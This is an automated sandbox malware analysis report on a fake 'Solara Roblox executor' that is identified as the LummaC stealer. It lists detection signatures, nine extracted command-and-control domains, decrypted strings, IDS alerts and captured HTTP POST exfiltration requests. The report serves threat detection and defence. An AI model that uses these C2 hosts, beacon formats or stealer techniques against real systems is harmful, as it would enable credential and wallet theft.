Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Solara-Roblox-Executor-v3.exe

Overview

General Information

Sample name:Solara-Roblox-Executor-v3.exe
Analysis ID:1582867
MD5:d2b09b1bda10143724a24534e31d44db
SHA1:6838edf7603b3a2be8195f5029223c808cdde9a4
SHA256:0336d6c3b8629f426c417a0999b65f74e804d11b28412482d72a004a9c6019a1
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Solara-Roblox-Executor-v3.exe (PID: 5344 cmdline: "C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe" MD5: D2B09B1BDA10143724A24534E31D44DB)
    • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["nearycrepso.shop", "fancywaxxers.shop", "cloudewahsj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "yau6Na--899083440"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000003.2093656620.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:06.923281+010020283713Unknown Traffic192.168.2.549704104.21.96.1443TCP
                2024-12-31T17:23:08.463581+010020283713Unknown Traffic192.168.2.549705104.21.96.1443TCP
                2024-12-31T17:23:09.664220+010020283713Unknown Traffic192.168.2.549706104.21.96.1443TCP
                2024-12-31T17:23:10.741890+010020283713Unknown Traffic192.168.2.549707104.21.96.1443TCP
                2024-12-31T17:23:12.278928+010020283713Unknown Traffic192.168.2.549708104.21.96.1443TCP
                2024-12-31T17:23:13.856635+010020283713Unknown Traffic192.168.2.549709104.21.96.1443TCP
                2024-12-31T17:23:15.337203+010020283713Unknown Traffic192.168.2.549710104.21.96.1443TCP
                2024-12-31T17:23:18.415376+010020283713Unknown Traffic192.168.2.549711104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:07.532015+010020546531A Network Trojan was detected192.168.2.549704104.21.96.1443TCP
                2024-12-31T17:23:08.907058+010020546531A Network Trojan was detected192.168.2.549705104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:07.532015+010020498361A Network Trojan was detected192.168.2.549704104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:08.907058+010020498121A Network Trojan was detected192.168.2.549705104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:06.923281+010020586571Domain Observed Used for C2 Detected192.168.2.549704104.21.96.1443TCP
                2024-12-31T17:23:08.463581+010020586571Domain Observed Used for C2 Detected192.168.2.549705104.21.96.1443TCP
                2024-12-31T17:23:09.664220+010020586571Domain Observed Used for C2 Detected192.168.2.549706104.21.96.1443TCP
                2024-12-31T17:23:10.741890+010020586571Domain Observed Used for C2 Detected192.168.2.549707104.21.96.1443TCP
                2024-12-31T17:23:12.278928+010020586571Domain Observed Used for C2 Detected192.168.2.549708104.21.96.1443TCP
                2024-12-31T17:23:13.856635+010020586571Domain Observed Used for C2 Detected192.168.2.549709104.21.96.1443TCP
                2024-12-31T17:23:15.337203+010020586571Domain Observed Used for C2 Detected192.168.2.549710104.21.96.1443TCP
                2024-12-31T17:23:18.415376+010020586571Domain Observed Used for C2 Detected192.168.2.549711104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:06.437136+010020586561Domain Observed Used for C2 Detected192.168.2.5573431.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-31T17:23:14.427599+010020480941Malware Command and Control Activity Detected192.168.2.549709104.21.96.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: https://fancywaxxers.shop/api/(bAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/iAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiPSAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/api#Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/apiOAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/C1Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/yAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/CAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/aAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/qAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/0Avira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop:443/apiAvira URL Cloud: Label: malware
                Source: https://fancywaxxers.shop/141638Avira URL Cloud: Label: malware
                Source: 00000000.00000002.2024667053.000000000294B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["nearycrepso.shop", "fancywaxxers.shop", "cloudewahsj.shop", "noisycuttej.shop", "abruptyopsn.shop", "wholersorie.shop", "rabidcowse.shop", "framekgirus.shop", "tirepublicerj.shop"], "Build id": "yau6Na--899083440"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
                Source: Solara-Roblox-Executor-v3.exeJoe Sandbox ML: detected
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rabidcowse.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: noisycuttej.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: framekgirus.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wholersorie.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: nearycrepso.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: fancywaxxers.shop
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000006.00000002.2145098110.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--899083440
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 6_2_0041726D CryptUnprotectData,6_2_0041726D
                Source: Solara-Roblox-Executor-v3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0030B6E8 FindFirstFileExW,0_2_0030B6E8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 0_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0030B799
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_0030B6E8 FindFirstFileExW,3_2_0030B6E8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 3_2_0030B799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_0030B799
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 6E87DD67h6_2_0043A940
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-40h]6_2_0043E910
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov edx, ecx6_2_0040DA95
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebx+02h]6_2_00426470
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov eax, ebx6_2_004374E0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov esi, eax6_2_004374E0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp word ptr [edi+edx], 0000h6_2_00417058
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 24D673BAh6_2_0043B060
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov edx, eax6_2_00426800
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh6_2_00422810
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4B908401h]6_2_00426820
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]6_2_00426820
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]6_2_00426820
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+00000088h]6_2_004160E7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+00000088h]6_2_004160E7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+eax*8], 385488F2h6_2_004160E7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]6_2_0043C8EF
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+08h]6_2_0041A0F0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_0041C8B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_004240B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov dword ptr [esp+00000BE0h], CEC9C0CBh6_2_004240B0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov word ptr [edx], ax6_2_00417957
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov byte ptr [esi], al6_2_0042D109
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_00422130
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+02h]6_2_00422130
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+ecx*8], 344CE4E0h6_2_0041993B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx]6_2_00425A00
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_00424200
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov dword ptr [esp+00000BE0h], CEC9C0CBh6_2_00424200
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov byte ptr [edi], cl6_2_0042C20F
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_0042C20F
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-08h]6_2_0043B210
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-08h]6_2_0043B210
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h6_2_0043B210
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000FDh]6_2_0043DAC5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]6_2_0042A2E0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h6_2_00420A90
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [eax+esi]6_2_00402B40
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_0042635C
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_0042C20A
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then jmp dword ptr [0044480Ch]6_2_00415B6C
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000208h]6_2_0040D32F
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]6_2_004073A0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]6_2_004073A0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov word ptr [edi], cx6_2_0041644B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08D8A46Eh]6_2_0041644B
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ebx, byte ptr [edx]6_2_00434C50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, cx6_2_0042D479
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov word ptr [eax], cx6_2_00428423
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+eax*8], 385488F2h6_2_00417CC7
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08D8A46Eh]6_2_00416CC8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]6_2_00421D50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh6_2_00437D00
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h6_2_00437D00
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx eax, byte ptr [esp+edi+1B0B6431h]6_2_00408DE0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h6_2_004255F0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 344CE4E0h6_2_00417582
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h6_2_00422D94
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0000026Ch]6_2_0042C5AC
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, eax6_2_00423DB0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov dword ptr [esp+00000BE0h], CEC9C0CBh6_2_00423DB0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov edi, dword ptr [esp+2Ch]6_2_00423DB0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]6_2_00426DB6
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+50h]6_2_00426DB6
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then jmp eax6_2_00426DB6
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3D17632Eh6_2_0043AE40
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov byte ptr [edi], cl6_2_0041E660
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0000026Ch]6_2_0042C569
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0000026Ch]6_2_0042C600
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov edx, ecx6_2_0043E630
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov dword ptr [esp+28h], 5C445E58h6_2_004296D5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+28h]6_2_00416ED8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28h]6_2_00416ED8
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]6_2_004386F9
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h6_2_00414EA0
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+4E024047h]6_2_0040C6B5
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov byte ptr [edi], al6_2_00417F48
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then mov ecx, edx6_2_00437F50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h6_2_00437F50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], 31E2A9F4h6_2_00437F50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then test eax, eax6_2_00437F50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then cmp edi, esi6_2_00437F50
                Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-3BDB79C9h]6_2_0041C7A2

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2058656 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) : 192.168.2.5:57343 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49709 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49704 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49711 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49710 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49708 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49707 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.5:49706 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.96.1:443
                Source: Malware configuration extractorURLs: nearycrepso.shop
                Source: Malware configuration extractorURLs: fancywaxxers.shop
                Source: Malware configuration extractorURLs: cloudewahsj.shop
                Source: Malware configuration extractorURLs: noisycuttej.shop
                Source: Malware configuration extractorURLs: abruptyopsn.shop
                Source: Malware configuration extractorURLs: wholersorie.shop
                Source: Malware configuration extractorURLs: rabidcowse.shop
                Source: Malware configuration extractorURLs: framekgirus.shop
                Source: Malware configuration extractorURLs: tirepublicerj.shop
                Source: global trafficTCP traffic: 192.168.2.5:52375 -> 1.1.1.1:53
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: fancywaxxers.shop
